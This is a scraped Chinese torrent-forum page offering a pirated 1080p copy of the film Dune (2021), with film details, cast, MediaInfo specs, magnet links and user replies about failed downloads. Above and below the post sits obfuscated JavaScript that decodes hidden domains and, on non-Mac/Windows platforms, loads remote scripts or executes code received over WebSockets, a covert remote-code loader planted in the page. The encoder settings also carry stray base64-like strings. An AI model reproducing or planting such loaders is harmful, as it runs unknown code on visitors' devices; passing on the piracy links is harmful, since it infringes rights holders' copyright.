沙丘/沙丘瀚战 Dune.2021.1080p.WEBRip.DD5.1.x264-SHITBOX.外挂中文字幕 10.60GB

版主小s 1月前 1664

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 沙丘 / 沙丘瀚战(港)

◎片 名 Dune

◎年 代 2021

◎产 地 加拿大 / 匈牙利 / 美国

◎类 别 剧情 / 科幻 / 冒险

◎语 言 英语

◎上映日期 2021-10-22(美国/中国大陆) / 2021-09-03(威尼斯电影节) / 2021-09-11(多伦多电影节)

◎IMDb链接 https://www.imdb.com/title/tt1160419/

◎豆瓣评分 8.0/10 (6183人评价)

◎豆瓣链接 https://movie.douban.com/subject/3001114/

◎片 长 156分钟

◎导 演 丹尼斯·维伦纽瓦 Denis Villeneuve (id:1028333)

◎编 剧 丹尼斯·维伦纽瓦 Denis Villeneuve (id:1028333)

乔·斯派茨 Jon Spaihts (id:1320120)

艾瑞克·罗斯 Eric Roth (id:1000393)

弗兰克·赫伯特 Frank Herbert (id:1028181)

◎演 员 蒂莫西·柴勒梅德 Timothée Chalamet (id:1325862)

丽贝卡·弗格森 Rebecca Ferguson (id:1088314)

奥斯卡·伊萨克 Oscar Isaac (id:1012481)

戴夫·巴蒂斯塔 Dave Bautista (id:1014003)

赞达亚 Zendaya (id:1325576)

杰森·莫玛 Jason Momoa (id:1022614)

乔什·布洛林 Josh Brolin (id:1004568)

哈维尔·巴登 Javier Bardem (id:1054414)

斯特兰·斯卡斯加德 Stellan Skarsg?rd (id:1017918)

夏洛特·兰普林 Charlotte Rampling (id:1007020)

大卫·达斯马齐连 David Dastmalchian (id:1337583)

莎伦·邓肯-布鲁斯特 Sharon Duncan-Brewster (id:1192335)

斯蒂芬·亨德森 Stephen Henderson (id:1098483)

迈克尔·纳尔多内 Michael Nardone (id:1132642)

张震 Chen Chang (id:1077991)

巴布斯·奥卢桑莫昆 Babs Olusanmokun (id:1412919)

Oliver Ryan Oliver Ryan (id:1450193)

查理·罗尔斯 Charlie Rawes (id:1395007)

格洛里亚·奥比安约 Gloria Obianyo (id:1417321)

保罗·布林 Paul Bullion (id:1392807)

比约恩·弗赖贝格 Bj?rn Freiberg (id:1409305)

理查德·P·鲁宾斯坦 Richard P. Rubinstein (id:1019479)

凯文·J·安德森 Kevin J. Anderson (id:1054184)

丹尼斯·维伦纽瓦 Denis Villeneuve (id:1028333)

托马斯·图尔 Thomas Tull (id:1348364)

汉斯·季默 Hans Zimmer (id:1054386)

格雷格·弗莱瑟 Greig Fraser (id:1028361)

乔·沃克 Joe Walker (id:1336020)

帕特里斯·维梅特 Patrice Vermette (id:1299995)

汤姆·布朗 Tom Brown (id:1055694)

理查德·罗伯茨 Richard Roberts (id:1295779)

杰奎琳·韦斯特 Jacqueline West (id:1300754)

◎标 签 科幻 / 沙丘 / 美国 / 2021 / 奇幻 / 经典 / 冒险 / 剧情

◎简 介

电影《沙丘》为观众呈现了一段神秘而感人至深的英雄之旅。天赋异禀的少年保罗·厄崔迪被命运指引,为了保卫自己的家族和人民,决心前往浩瀚宇宙间最危险的星球,开启一场惊心动魄的冒险。与此同时,各路势力为了抢夺这颗星球上一种能够释放人类最大潜力的珍贵资源而纷纷加入战场。最终,唯有那些能够战胜内心恐惧的人才能生存下去。

◎获奖情况 (共2项)

第7届豆瓣电影年度榜单 (2020)

最值得期待的外语电影(提名)

第6届豆瓣电影年度榜单 (2019)

最值得期待的外语电影(提名)

  1. Video

  2. ID : 1

  3. Format : AVC

  4. Format/Info : Advanced Video Codec

  5. Format profile : [email protected]

  6. Format settings : CABAC / 4 Ref Frames

  7. Format settings, CABAC : Yes

  8. Format settings, Reference frames : 4 frames

  9. Codec ID : V_MPEG4/ISO/AVC

  10. Duration : 2 h 28 min

  11. Bit rate : 9 807 kb/s

  12. Width : 1 920 pixels

  13. Height : 776 pixels

  14. Display aspect ratio : 2.474

  15. Frame rate mode : Constant

  16. Frame rate : 25.000 FPS

  17. Color space : YUV

  18. Chroma subsampling : 4:2:0

  19. Bit depth : 8 bits

  20. Scan type : Progressive

  21. Bits/(Pixel*Frame) : 0.263

  22. Stream size : 10.2 GiB (96%)

  23. Writing library : x264 core 142 r2479 dd79a61

  24. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x3:0x113 / me=hex / subme=7 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=16 / chroma_me=1 / trellis=1 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=24 / lookahead_threads=4 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / bframes=3 / b_pyramid=2 / b_adapt=1 / b_bias=0 / direct=1 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=25 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=40 / rc=2pass / mbtree=1 / bitrate=9807 / ratetol=1.0 / qcomp=0.60 / qpmin=0 / qpmax=69 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=62500 / vbv_bufsize=78125 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  25. Language : English

  26. Default : Yes

  27. Forced : No

  28. Color range : Limited

  29. Color primaries : BT.709

  30. Transfer characteristics : BT.709

  31. Matrix coefficients : BT.709


  32. Audio

  33. ID : 2

  34. Format : AC-3

  35. Format/Info : Audio Coding 3

  36. Commercial name : Dolby Digital

  37. Codec ID : A_AC3

  38. Duration : 2 h 28 min

  39. Bit rate mode : Constant

  40. Bit rate : 384 kb/s

  41. Channel(s) : 6 channels

  42. Channel layout : L R C LFE Ls Rs

  43. Sampling rate : 48.0 kHz

  44. Frame rate : 31.250 FPS (1536 SPF)

  45. Compression mode : Lossy

  46. Stream size : 409 MiB (4%)

  47. Language : English

  48. Service kind : Complete Main

  49. Default : Yes

  50. Forced : No


  51. Text #1

  52. ID : 3

  53. Format : UTF-8

  54. Codec ID : S_TEXT/UTF8

  55. Codec ID/Info : UTF-8 Plain Text

  56. Duration : 1 h 49 min

  57. Bit rate : 1 b/s

  58. Count of elements : 43

  59. Stream size : 1.08 KiB (0%)

  60. Title : FORCED

  61. Language : English

  62. Default : No

  63. Forced : Yes


  64. Text #2

  65. ID : 4

  66. Format : UTF-8

  67. Codec ID : S_TEXT/UTF8

  68. Codec ID/Info : UTF-8 Plain Text

  69. Duration : 2 h 20 min

  70. Bit rate : 34 b/s

  71. Count of elements : 998

  72. Stream size : 35.8 KiB (0%)

  73. Language : English

  74. Default : Yes

  75. Forced : No

复制代码

 

 


TAGS 冒险 剧情 科幻

磁力链:
  • magnet:?xt=urn:btih:5F6FBC8F291D4DD2DFFE1F62A2555588C328A982
  • magnet:?xt=urn:btih:4D165EAE3C3F1C8FCD467E7A9B21ADD164D6E969

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (6)
  • 一天天 1月前
    2
    不能下了,楼主
  • 版主小s 1月前
    3
    一天天 不能下了,楼主
    如果是因为迅雷下载提示版权原因,那自行查看置顶帖,种子无任何问题
  • wybin 1月前
    4
    牛逼啊。谢谢了
  • 魔女时尚 1月前
    5
    老猪讲的所有方法都试了,要不就是不成功,要不就是下载速度只有10几KB。。。
    老猪还是转到百度云吧
  • 魔女时尚 1月前
    6
    magnet:?xt=urn:btih:5F6FBC8F291D4DD2DFFE1F62A2555588C328A982&dn=紗鳅.mp4&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce
    找到这个目前能下载
  • 版主小s 1月前
    7
    魔女时尚 magnet:?xt=urn:btih:5F6FBC8F291D4DD2DFFE1F62A2555588C328A982&dn=紗鳅.mp4&tr=udp%3a%2f%2ftracke ...
    ok

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};